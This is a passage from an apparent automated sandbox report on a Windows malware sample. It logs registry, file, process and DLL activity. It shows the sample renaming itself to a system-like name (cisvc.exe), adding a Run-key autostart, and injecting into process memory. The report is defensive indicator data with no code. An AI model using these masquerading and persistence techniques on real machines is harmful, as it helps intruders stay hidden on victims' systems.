             Value Name: [ SaferFlags ], Value: [ 0 ], 1 time
        Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91} ], 
             Value Name: [ HashAlg ], Value: [ 32771 ], 1 time
        Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91} ], 
             Value Name: [ ItemData ], Value: [ 0x67b0d48b343a3fd3bce9dc646704f394 ], 1 time
        Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91} ], 
             Value Name: [ ItemSize ], Value: [ 517 ], 1 time
        Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91} ], 
             Value Name: [ SaferFlags ], Value: [ 0 ], 1 time
        Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f} ], 
             Value Name: [ HashAlg ], Value: [ 32771 ], 1 time
        Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f} ], 
             Value Name: [ ItemData ], Value: [ 0x327802dcfef8c893dc8ab006dd847d1d ], 1 time
        Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f} ], 
             Value Name: [ ItemSize ], Value: [ 918 ], 1 time
        Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f} ], 
             Value Name: [ SaferFlags ], Value: [ 0 ], 1 time
        Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d} ], 
             Value Name: [ HashAlg ], Value: [ 32771 ], 1 time
        Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d} ], 
             Value Name: [ ItemData ], Value: [ 0xbd9a2adb42ebd8560e250e4df8162f67 ], 1 time
        Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d} ], 
             Value Name: [ ItemSize ], Value: [ 229 ], 1 time
        Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d} ], 
             Value Name: [ SaferFlags ], Value: [ 0 ], 1 time
        Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc} ], 
             Value Name: [ HashAlg ], Value: [ 32771 ], 1 time
        Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc} ], 
             Value Name: [ ItemData ], Value: [ 0x386b085f84ecf669d36b956a22c01e80 ], 1 time
        Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc} ], 
             Value Name: [ ItemSize ], Value: [ 370 ], 1 time
        Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc} ], 
             Value Name: [ SaferFlags ], Value: [ 0 ], 1 time
        Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} ], 
             Value Name: [ ItemData ], Value: [ %HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache%OLK* ], 1 time
        Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} ], 
             Value Name: [ SaferFlags ], Value: [ 0 ], 1 time
        Key: [ HKLM\System\CurrentControlSet\Control\Terminal Server ], 
             Value Name: [ TSUserEnabled ], Value: [ 0 ], 1 time
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders ], 
             Value Name: [ Cache ], Value: [ C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files ], 1 time

[=============================================================================]
    2.b) 939b752657.exe - File Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
    Files Renamed:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
        Old File Name: [ C:\939b752657.exe ], New File Name: [ C:\Documents and Settings\Administrator\cisvc.exe ]

[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
    Memory Mapped Files:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
        File Name: [ C:\Documents and Settings\Administrator\cisvc.exe ]
        File Name: [ C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll ]
        File Name: [ C:\WINDOWS\WindowsShell.Manifest ]
        File Name: [ C:\WINDOWS\system32\Apphelp.dll ]
        File Name: [ C:\WINDOWS\system32\WININET.DLL ]
        File Name: [ C:\Windows\AppPatch\sysmain.sdb ]

[=============================================================================]
    2.c) 939b752657.exe - Process Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
    Processes Created:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
        Executable: [ C:\Documents and Settings\Administrator\cisvc.exe ], Command Line: [  ]
        Executable: [  ], Command Line: [ C:\Documents and Settings\Administrator\cisvc.exe ]

[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
    Remote Threads Created:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
        Affected Process: [ C:\Documents and Settings\Administrator\cisvc.exe ]

[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
    Foreign Memory Regions Read:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
        Process: [ C:\Documents and Settings\Administrator\cisvc.exe ]

[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
    Foreign Memory Regions Written:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
        Process: [ C:\Documents and Settings\Administrator\cisvc.exe ]

[#############################################################################]
    3. cisvc.exe
[#############################################################################]
[=============================================================================]
    General information about this executable
[=============================================================================]
        Analysis Reason: Started by 939b752657.exe
        Filename:        cisvc.exe
        MD5:             939b7526572f0c128c0cda9baed7f8a3
        SHA-1:           eebe799a4b3ac5af14a57be73c1fecde159ca652
        File Size:       7763 Bytes
        Command Line:    "C:\Documents and Settings\Administrator\cisvc.exe"
        Process-status
        at analysis end: alive
        Exit Code:       0

[=============================================================================]
    Load-time Dlls
[=============================================================================]
        Module Name: [ C:\WINDOWS\system32\ntdll.dll ],
               Base Address: [0x7C900000 ], Size: [0x000AF000 ]
        Module Name: [ C:\Documents and Settings\Administrator\cisvc.exe ],
               Base Address: [0x00400000 ], Size: [0x00007000 ]
        Module Name: [ C:\WINDOWS\system32\kernel32.dll ],
               Base Address: [0x7C800000 ], Size: [0x000F6000 ]
        Module Name: [ C:\WINDOWS\system32\ADVAPI32.DLL ],
               Base Address: [0x77DD0000 ], Size: [0x0009B000 ]
        Module Name: [ C:\WINDOWS\system32\RPCRT4.dll ],
               Base Address: [0x77E70000 ], Size: [0x00092000 ]
        Module Name: [ C:\WINDOWS\system32\Secur32.dll ],
               Base Address: [0x77FE0000 ], Size: [0x00011000 ]
        Module Name: [ C:\WINDOWS\system32\WININET.DLL ],
               Base Address: [0x771B0000 ], Size: [0x000AA000 ]
        Module Name: [ C:\WINDOWS\system32\CRYPT32.dll ],
               Base Address: [0x77A80000 ], Size: [0x00095000 ]
        Module Name: [ C:\WINDOWS\system32\MSASN1.dll ],
               Base Address: [0x77B20000 ], Size: [0x00012000 ]
        Module Name: [ C:\WINDOWS\system32\msvcrt.dll ],
               Base Address: [0x77C10000 ], Size: [0x00058000 ]
        Module Name: [ C:\WINDOWS\system32\USER32.dll ],
               Base Address: [0x7E410000 ], Size: [0x00091000 ]
        Module Name: [ C:\WINDOWS\system32\GDI32.dll ],
               Base Address: [0x77F10000 ], Size: [0x00049000 ]
        Module Name: [ C:\WINDOWS\system32\OLEAUT32.dll ],
               Base Address: [0x77120000 ], Size: [0x0008B000 ]
        Module Name: [ C:\WINDOWS\system32\ole32.dll ],
               Base Address: [0x774E0000 ], Size: [0x0013D000 ]
        Module Name: [ C:\WINDOWS\system32\SHLWAPI.dll ],
               Base Address: [0x77F60000 ], Size: [0x00076000 ]
        Module Name: [ C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll ],
               Base Address: [0x773D0000 ], Size: [0x00103000 ]

[=============================================================================]
    Run-time Dlls
[=============================================================================]
        Module Name: [ C:\WINDOWS\system32\NETAPI32.dll ],
               Base Address: [0x5B860000 ], Size: [0x00055000 ]
        Module Name: [ C:\WINDOWS\system32\comctl32.dll ],
               Base Address: [0x5D090000 ], Size: [0x0009A000 ]
        Module Name: [ C:\WINDOWS\system32\hnetcfg.dll ],
               Base Address: [0x662B0000 ], Size: [0x00058000 ]
        Module Name: [ C:\WINDOWS\System32\mswsock.dll ],
               Base Address: [0x71A50000 ], Size: [0x0003F000 ]
        Module Name: [ C:\WINDOWS\System32\wshtcpip.dll ],
               Base Address: [0x71A90000 ], Size: [0x00008000 ]
        Module Name: [ C:\WINDOWS\system32\WS2HELP.dll ],
               Base Address: [0x71AA0000 ], Size: [0x00008000 ]
        Module Name: [ C:\WINDOWS\system32\WS2_32.dll ],
               Base Address: [0x71AB0000 ], Size: [0x00017000 ]
        Module Name: [ C:\WINDOWS\system32\wsock32.dll ],
               Base Address: [0x71AD0000 ], Size: [0x00009000 ]
        Module Name: [ C:\WINDOWS\system32\sensapi.dll ],
               Base Address: [0x722B0000 ], Size: [0x00005000 ]
        Module Name: [ C:\WINDOWS\system32\USERENV.dll ],
               Base Address: [0x769C0000 ], Size: [0x000B4000 ]
        Module Name: [ C:\WINDOWS\system32\WINMM.dll ],
               Base Address: [0x76B40000 ], Size: [0x0002D000 ]
        Module Name: [ C:\WINDOWS\system32\rtutils.dll ],
               Base Address: [0x76E80000 ], Size: [0x0000E000 ]
        Module Name: [ C:\WINDOWS\system32\rasman.dll ],
               Base Address: [0x76E90000 ], Size: [0x00012000 ]
        Module Name: [ C:\WINDOWS\system32\TAPI32.dll ],
               Base Address: [0x76EB0000 ], Size: [0x0002F000 ]
        Module Name: [ C:\WINDOWS\system32\RASAPI32.DLL ],
               Base Address: [0x76EE0000 ], Size: [0x0003C000 ]
        Module Name: [ C:\WINDOWS\system32\DNSAPI.dll ],
               Base Address: [0x76F20000 ], Size: [0x00027000 ]
        Module Name: [ C:\WINDOWS\system32\rasadhlp.dll ],
               Base Address: [0x76FC0000 ], Size: [0x00006000 ]
        Module Name: [ C:\WINDOWS\system32\VERSION.dll ],
               Base Address: [0x77C00000 ], Size: [0x00008000 ]
        Module Name: [ C:\WINDOWS\system32\shell32.dll ],
               Base Address: [0x7C9C0000 ], Size: [0x00817000 ]
        Module Name: [ C:\WINDOWS\system32\urlmon.dll ],
               Base Address: [0x7E1E0000 ], Size: [0x000A2000 ]

[=============================================================================]
    3.a) cisvc.exe - Registry Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
    Registry Values Modified:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
        Key: [ HKLM\SYSTEM\CURRENTCONTROLSET\HARDWARE PROFILES\CURRENT\Software\Microsoft\windows\CurrentVersion\Internet Settings ], 
             Value Name: [ ProxyEnable ], New Value: [ 0 ]
        Key: [ HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders ], 
             Value Name: [ Common AppData ], New Value: [ C:\Documents and Settings\All Users\Application Data ]
        Key: [ HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths ], 
             Value Name: [ Directory ], New Value: [ C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5 ]
        Key: [ HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths ], 
             Value Name: [ Paths ], New Value: [ 4 ]
        Key: [ HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\Path1 ], 
             Value Name: [ CacheLimit ], New Value: [ 40852 ]
        Key: [ HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\Path1 ], 
             Value Name: [ CachePath ], New Value: [ C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\Cache1 ]
        Key: [ HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\Path2 ], 
             Value Name: [ CacheLimit ], New Value: [ 40852 ]
        Key: [ HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\Path2 ], 
             Value Name: [ CachePath ], New Value: [ C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\Cache2 ]
        Key: [ HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\Path3 ], 
             Value Name: [ CacheLimit ], New Value: [ 40852 ]
        Key: [ HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\Path3 ], 
             Value Name: [ CachePath ], New Value: [ C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\Cache3 ]
        Key: [ HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\Path4 ], 
             Value Name: [ CacheLimit ], New Value: [ 40852 ]
        Key: [ HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\Path4 ], 
             Value Name: [ CachePath ], New Value: [ C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\Cache4 ]
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders ], 
             Value Name: [ AppData ], New Value: [ C:\Documents and Settings\Administrator\Application Data ]
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders ], 
             Value Name: [ Cache ], New Value: [ C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files ]
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders ], 
             Value Name: [ Cookies ], New Value: [ C:\Documents and Settings\Administrator\Cookies ]
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders ], 
             Value Name: [ History ], New Value: [ C:\Documents and Settings\Administrator\Local Settings\History ]
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ], 
             Value Name: [ IntranetName ], New Value: [ 1 ]
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ], 
             Value Name: [ ProxyBypass ], New Value: [ 1 ]
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ], 
             Value Name: [ UNCAsIntranet ], New Value: [ 1 ]
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Run ], 
             Value Name: [ SystemService ], New Value: [ C:\Documents and Settings\Administrator\cisvc.exe ]
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\windows\CurrentVersion\Internet Settings ], 
             Value Name: [ MigrateProxy ], New Value: [ 1 ]
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\windows\CurrentVersion\Internet Settings ], 
             Value Name: [ ProxyEnable ], New Value: [ 0 ]
        Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections ], 
             Value Name: [ SavedLegacySettings ], New Value: [ 0x3c0000000500000009000000000000000000000000000000000000000000 ]

[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
    Registry Values Read:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
        Key: [ HKLM\SOFTWARE\CLASSES\AUTOPROXYTYPES\APPLICATION/X-INTERNET-SIGNUP ], 
             Value Name: [ Default ], Value: [ 0x00000000 ], 1 time
        Key: [ HKLM\SOFTWARE\CLASSES\AUTOPROXYTYPES\APPLICATION/X-INTERNET-SIGNUP ], 
             Value Name: [ DllFile ], Value: [ %SystemRoot%\system32\iedkcs32.dll ], 2 times
        Key: [ HKLM\SOFTWARE\CLASSES\AUTOPROXYTYPES\APPLICATION/X-INTERNET-SIGNUP ], 
             Value Name: [ FileExtensions ], Value: [ .ins ], 2 times
        Key: [ HKLM\SOFTWARE\CLASSES\AUTOPROXYTYPES\APPLICATION/X-NS-PROXY-AUTOCONFIG ], 
             Value Name: [ Default ], Value: [ 0x01000000 ], 1 time
        Key: [ HKLM\SOFTWARE\CLASSES\AUTOPROXYTYPES\APPLICATION/X-NS-PROXY-AUTOCONFIG ], 
             Value Name: [ DllFile ], Value: [ %SystemRoot%\system32\jsproxy.dll ], 2 times
        Key: [ HKLM\SOFTWARE\CLASSES\AUTOPROXYTYPES\APPLICATION/X-NS-PROXY-AUTOCONFIG ], 
             Value Name: [ FileExtensions ], Value: [ .pac;.jvs;.js ], 2 times
        Key: [ HKLM\SOFTWARE\CLASSES\AUTOPROXYTYPES\APPLICATION/X-NS-PROXY-AUTOCONFIG ], 
             Value Name: [ Flags ], Value: [ 0x01000000 ], 1 time
        Key: [ HKLM\SOFTWARE\CLASSES\MIME\DATABASE\CONTENT TYPE\TEXT/HTML ], 
             Value Name: [ Extension ], Value: [ .htm ], 2 times
        Key: [ HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings ], 
             Value Name: [ UrlEncoding ], Value: [ 0x00000000 ], 2 times
        Key: [ HKLM\SYSTEM\CurrentControlSet\Control\Session Manager ], 
             Value Name: [ CriticalSectionTimeout ], Value: [ 2592000 ], 1 time
        Key: [ HKLM\SYSTEM\CurrentControlSet\Services\Winsock\Parameters ], 
             Value Name: [ Transports ], Value: [ 0x5400630070006900700000004e0065007400420049004f00530000000000 ], 2 times
        Key: [ HKLM\SYSTEM\Setup ], 
             Value Name: [ SystemSetupInProgress ], Value: [ 0 ], 1 time
        Key: [ HKLM\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BEHAVIORS ], 
             Value Name: [ * ], Value: [ 1 ], 1 time
        Key: [ HKLM\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_MK_PROTOCOL ], 
             Value Name: [ * ], Value: [ 1 ], 1 time
        Key: [ HKLM\Software\Microsoft\Tracing ], 
             Value Name: [ EnableConsoleTracing ], Value: [ 0 ], 1 time
        Key: [ HKLM\Software\Microsoft\Tracing\RASAPI32 ], 
             Value Name: [ ConsoleTracingMask ], Value: [ 4294901760 ], 2 times
        Key: [ HKLM\Software\Microsoft\Tracing\RASAPI32 ], 
             Value Name: [ EnableConsoleTracing ], Value: [ 0 ], 2 times
        Key: [ HKLM\Software\Microsoft\Tracing\RASAPI32 ], 
             Value Name: [ EnableFileTracing ], Value: [ 0 ], 2 times
        Key: [ HKLM\Software\Microsoft\Tracing\RASAPI32 ], 
             Value Name: [ FileDirectory ], Value: [ %windir%\tracing ], 4 times
        Key: [ HKLM\Software\Microsoft\Tracing\RASAPI32 ], 
             Value Name: [ FileTracingMask ], Value: [ 4294901760 ], 2 times
        Key: [ HKLM\Software\Microsoft\Tracing\RASAPI32 ], 
             Value Name: [ MaxFileSize ], Value: [ 1048576 ], 2 times
        Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList ], 
             Value Name: [ AllUsersProfile ], Value: [ All Users ], 2 times
        Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList ], 
             Value Name: [ DefaultUserProfile ], Value: [ Default User ], 2 times
        Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList ], 
             Value Name: [ ProfilesDirectory ], Value: [ %SystemDrive%\Documents and Settings ], 4 times
        Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-842925246-1425521274-308236825-500 ], 
             Value Name: [ ProfileImagePath ], Value: [ %SystemDrive%\Documents and Settings\Administrator ], 2 times
        Key: [ HKLM\Software\Microsoft\Windows\CurrentVersion ], 
             Value Name: [ CommonFilesDir ], Value: [ C:\Program Files\Common Files ], 2 times
        Key: [ HKLM\Software\Microsoft\Windows\CurrentVersion ], 
             Value Name: [ ProgramFilesDir ], Value: [ C:\Program Files ], 2 times
        Key: [ HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders ], 
             Value Name: [ Common AppData ], Value: [ %ALLUSERSPROFILE%\Application Data ], 1 time
        Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers ], 
             Value Name: [ TransparentEnabled ], Value: [ 1 ], 1 time
        Key: [ HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName ], 
             Value Name: [ ComputerName ], Value: [ PC ], 3 times
        Key: [ HKLM\System\CurrentControlSet\Control\MediaProperties\PrivateProperties\Joystick\Winmm ], 
             Value Name: [ wheel ], Value: [ 1 ], 1 time
        Key: [ HKLM\System\CurrentControlSet\Control\ProductOptions ], 
             Value Name: [ ProductType ], Value: [ WinNT ], 1 time
        Key: [ HKLM\System\CurrentControlSet\Control\Session Manager\Environment ], 
             Value Name: [ ComSpec ], Value: [ %SystemRoot%\system32\cmd.exe ], 4 times
        Key: [ HKLM\System\CurrentControlSet\Control\Session Manager\Environment ], 
             Value Name: [ FP_NO_HOST_CHECK ], Value: [ NO ], 4 times
        Key: [ HKLM\System\CurrentControlSet\Control\Session Manager\Environment ], 
             Value Name: [ NUMBER_OF_PROCESSORS ], Value: [ 1 ], 4 times
        Key: [ HKLM\System\CurrentControlSet\Control\Session Manager\Environment ], 
             Value Name: [ OS ], Value: [ Windows_NT ], 4 times
        Key: [ HKLM\System\CurrentControlSet\Control\Session Manager\Environment ], 
             Value Name: [ PATHEXT ], Value: [ .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH ], 4 times
        Key: [ HKLM\System\CurrentControlSet\Control\Session Manager\Environment ], 
             Value Name: [ PROCESSOR_ARCHITECTURE ], Value: [ x86 ], 4 times
        Key: [ HKLM\System\CurrentControlSet\Control\Session Manager\Environment ], 
             Value Name: [ PROCESSOR_IDENTIFIER ], Value: [ x86 Family 6 Model 3 Stepping 3, GenuineIntel ], 4 times
        Key: [ HKLM\System\CurrentControlSet\Control\Session Manager\Environment ], 
             Value Name: [ PROCESSOR_LEVEL ], Value: [ 6 ], 4 times
        Key: [ HKLM\System\CurrentControlSet\Control\Session Manager\Environment ], 
             Value Name: [ PROCESSOR_REVISION ], Value: [ 0303 ], 4 times
        Key: [ HKLM\System\CurrentControlSet\Control\Session Manager\Environment ], 
             Value Name: [ Path ], Value: [ %SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem ], 4 times
        Key: [ HKLM\System\CurrentControlSet\Control\Session Manager\Environment ], 
             Value Name: [ TEMP ], Value: [ %SystemRoot%\TEMP ], 4 times
        Key: [ HKLM\System\CurrentControlSet\Control\Session Manager\Environment ], 
             Value Name: [ TMP ], Value: [ %SystemRoot%\TEMP ], 4 times
        Key: [ HKLM\System\CurrentControlSet\Control\Session Manager\Environment ], 
             Value Name: [ windir ], Value: [ %SystemRoot% ], 4 times
        Key: [ HKLM\System\CurrentControlSet\Control\Terminal Server ], 
             Value Name: [ TSUserEnabled ], Value: [ 0 ], 1 time
        Key: [ HKLM\System\CurrentControlSet\Services\Tcpip\Parameters ], 
             Value Name: [ Domain ], Value: [  ], 2 times
        Key: [ HKLM\System\CurrentControlSet\Services\Tcpip\Parameters ], 
             Value Name: [ Hostname ], Value: [ pc ], 2 times
        Key: [ HKLM\System\CurrentControlSet\Services\Tcpip\Parameters ], 
             Value Name: [ UseDomainNameDevolution ], Value: [ 0 ], 1 time
        Key: [ HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock ], 
             Value Name: [ HelperDllName ], Value: [ %SystemRoot%\System32\wshtcpip.dll ], 1 time
        Key: [ HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock ], 
             Value Name: [ Mapping ], Value: [ 0x0b0000000300000002000000010000000600000002000000010000000000 ], 1 time
        Key: [ HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock ], 
             Value Name: [ MaxSockaddrLength ], Value: [ 16 ], 1 time
        Key: [ HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock ], 
             Value Name: [ MinSockaddrLength ], Value: [ 16 ], 1 time
        Key: [ HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock ], 
             Value Name: [ UseDelayedAcceptance ], Value: [ 0 ], 1 time
        Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters ], 
             Value Name: [ WinSock_Registry_Version ], Value: [ 2.0 ], 4 times
        Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5 ], 
             Value Name: [ Num_Catalog_Entries ], Value: [ 3 ], 1 time
        Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5 ], 
             Value Name: [ Serial_Access_Num ], Value: [ 4 ], 2 times
        Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001 ], 
             Value Name: [ DisplayString ], Value: [ Tcpip ], 4 times
        Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001 ], 
             Value Name: [ Enabled ], Value: [ 1 ], 1 time
        Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001 ], 
             Value Name: [ LibraryPath ], Value: [ %SystemRoot%\System32\mswsock.dll ], 2 times
        Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001 ], 
             Value Name: [ ProviderId ], Value: [ 0x409d05229e7ecf11ae5a00aa00a7112b ], 1 time
        Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001 ], 
             Value Name: [ StoresServiceClassInfo ], Value: [ 0 ], 1 time
        Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001 ], 
             Value Name: [ SupportedNameSpace ], Value: [ 12 ], 1 time
        Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001 ], 
             Value Name: [ Version ], Value: [ 0 ], 1 time
        Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002 ], 
             Value Name: [ DisplayString ], Value: [ NTDS ], 4 times
        Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002 ], 
             Value Name: [ Enabled ], Value: [ 1 ], 1 time
        Key: [ HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002 ], 
